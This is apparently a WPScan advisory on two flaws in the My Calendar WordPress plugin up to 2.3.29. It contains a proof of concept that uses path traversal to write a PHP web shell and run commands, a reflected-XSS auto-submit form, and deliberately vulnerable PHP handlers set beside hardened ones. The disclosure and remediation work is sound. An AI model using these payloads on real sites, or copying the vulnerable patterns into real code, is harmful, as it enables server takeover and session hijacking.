My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS



Description
The style editor of the My Calendar plugin (admin.php?page=my-calendar-styles) writes the submitted stylesheet body to the path supplied in the mc_css_file POST parameter without confining it to the plugin's own styles directory. A logged-in administrator can therefore point it, via ../ traversal, at any file the web server user can write to, including PHP files under wp-content, and the written content is executed on the next request, as the proof of concept below shows. The write is also not gated on DISALLOW_FILE_EDIT, the wp-config.php constant that disables WordPress's built-in theme and plugin file editors, so that hardening setting does not stop it. A second issue: the help page (admin.php?page=my-calendar-help) reflects submitted form fields back into its markup without escaping, giving a reflected cross-site scripting bug; the proof of concept delivers it through an auto-submitting form carrying no nonce, so the victim only needs to be logged in to wp-admin.
Proof of Concept
Arbitrary File Override
-----------------------

POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles
   Post Data:
      _wpnonce[a_valid_nonce]
      mc_edit_style[true]
      mc_css_file[../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php]
      mc_show_css[]
      style[<?php passthru($_GET['exec']) ?>]
      save[Save+Changes]

GET http://localhost/wordpress/wp-content/plugins/some-plugin/some-writable-file.php?exec=id
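The following is an added illustration, not My Calendar's own code: a stylesheet save handler in the shape the proof of concept above exploits, next to a hardened version that honours DISALLOW_FILE_EDIT and confines the write to a single .css file inside the plugin's styles directory. The POST field names follow the proof of concept; the styles directory, the function names and the assumption that the caller has already verified the nonce and the manage_options capability are mine.

```php
<?php
// Added example, not the plugin's code. MC_STYLES_DIR and the function
// names are assumptions; the POST field names come from the PoC above.
define('MC_STYLES_DIR', __DIR__ . '/styles');

// Vulnerable pattern: the client-supplied filename is joined to the styles
// directory and written as-is. "../../.." escapes the directory, and the
// PHP payload in "style" lands in any file the web server user can write.
function mc_save_style_vulnerable(array $post) {
    if (empty($post['mc_edit_style']) || empty($post['save'])) {
        return false;
    }
    $file = MC_STYLES_DIR . '/' . $post['mc_css_file'];
    return file_put_contents($file, $post['style']) !== false;
}

// Hardened pattern. Assumes the caller already checked the nonce and the
// manage_options capability; those do not help here, because the attacker
// in the PoC is an administrator with a valid nonce.
function mc_save_style_hardened(array $post) {
    if (empty($post['mc_edit_style']) || empty($post['save'])) {
        return false;
    }
    // Honour the same kill switch WordPress core applies to its theme and
    // plugin editors.
    if (defined('DISALLOW_FILE_EDIT') && DISALLOW_FILE_EDIT) {
        return false;
    }
    // Keep only the last path component and require a plain .css name, so
    // traversal sequences and executable extensions are rejected outright.
    $name = basename((string) $post['mc_css_file']);
    if (!preg_match('/^[A-Za-z0-9_-]+\.css$/', $name)) {
        return false;
    }
    // Defence in depth: resolve the styles directory and confirm the
    // target's parent is exactly that directory. realpath() needs the
    // path to exist, so check the parent rather than the (possibly new) file.
    $dir = realpath(MC_STYLES_DIR);
    if ($dir === false) {
        return false;
    }
    $target = $dir . DIRECTORY_SEPARATOR . $name;
    if (realpath(dirname($target)) !== $dir) {
        return false;
    }
    return file_put_contents($target, (string) $post['style']) !== false;
}

// Constructed request mirroring the PoC (values are illustrative).
$request = [
    'mc_edit_style' => 'true',
    'mc_css_file'   => '../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php',
    'style'         => '<?php passthru($_GET[\'exec\']) ?>',
    'save'          => 'Save Changes',
];
// basename() reduces the path to some-writable-file.php, which fails the
// .css name check, so the hardened handler refuses the write.
var_dump(mc_save_style_hardened($request));
```

The extension check matters as much as the path check: even a write confined to the styles directory would be exploitable if the attacker could choose a .php name, since the PoC's payload is PHP, not CSS.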

Reflected XSS
-------------

<form name="myform"
action="http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-help"
method="POST">
<input name="generator" id="generator" value="1">
<input name="foo" id="foo" value="</textarea><script>alert(1)</script>">
<input type="submit" value="Submit">
</form>
<script>document.myform.submit();</script>
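The following is an added illustration, not My Calendar's own code: a help-page fragment that echoes the submitted form fields back inside a textarea, in the shape the proof of concept above exploits, next to the escaped version. The output format and function names are assumptions; the request values mirror the form above.

```php
<?php
// Added example, not the plugin's code. Output format and function
// names are assumptions; the field names come from the PoC form above.

// Vulnerable: raw POST values are concatenated into the textarea body, so
// a value such as "</textarea><script>alert(1)</script>" closes the
// element early and the script runs in the logged-in admin's browser.
function mc_render_generator_vulnerable(array $post) {
    $out = '<textarea name="mc_shortcode">[my_calendar';
    foreach ($post as $key => $value) {
        if ($key === 'generator') {
            continue;
        }
        $out .= ' ' . $key . '="' . $value . '"';
    }
    return $out . ']</textarea>';
}

// Hardened: every untrusted string is HTML-escaped at the point it is
// written into markup. Inside WordPress, esc_textarea() is the matching
// helper (it wraps htmlspecialchars() with the blog charset); plain PHP
// is used here so the example runs stand-alone.
function mc_render_generator_hardened(array $post) {
    $out = '<textarea name="mc_shortcode">[my_calendar';
    foreach ($post as $key => $value) {
        if ($key === 'generator') {
            continue;
        }
        // Field names are attacker-controlled too (the PoC invents "foo"),
        // so allow-list them instead of trying to escape them.
        if (!preg_match('/^[a-z_]+$/', $key)) {
            continue;
        }
        $out .= ' ' . $key . '="'
            . htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8')
            . '"';
    }
    return $out . ']</textarea>';
}

// Constructed request mirroring the PoC form.
$post = ['generator' => '1', 'foo' => '</textarea><script>alert(1)</script>'];
echo mc_render_generator_vulnerable($post), "\n";
echo mc_render_generator_hardened($post), "\n";
```

Run it and compare the two lines: the first carries a literal closing tag and a script element, the second carries only entity-encoded text, and a browser renders that text inside the textarea without executing anything. The same auto-submitting form would still reach the page, so a nonce check (check_admin_referer()) is the complement to escaping, not a substitute for it.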

Affects Plugin

Fixed in version 2.3.30

References

URL http://software-talk.org/blog/2015/05/arbitrary-file-override-reflected-xss-my-calendar-wordpress-plugin/

Classification

Type MULTI

Miscellaneous

Submitter Tim Coen
Submitter Website http://software-talk.org/blog
Views 235
Verified No
WPVDB ID 7990

Timeline

Publicly Published 2015-05-15
Added 2015-05-15
Last Updated 2015-05-15

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.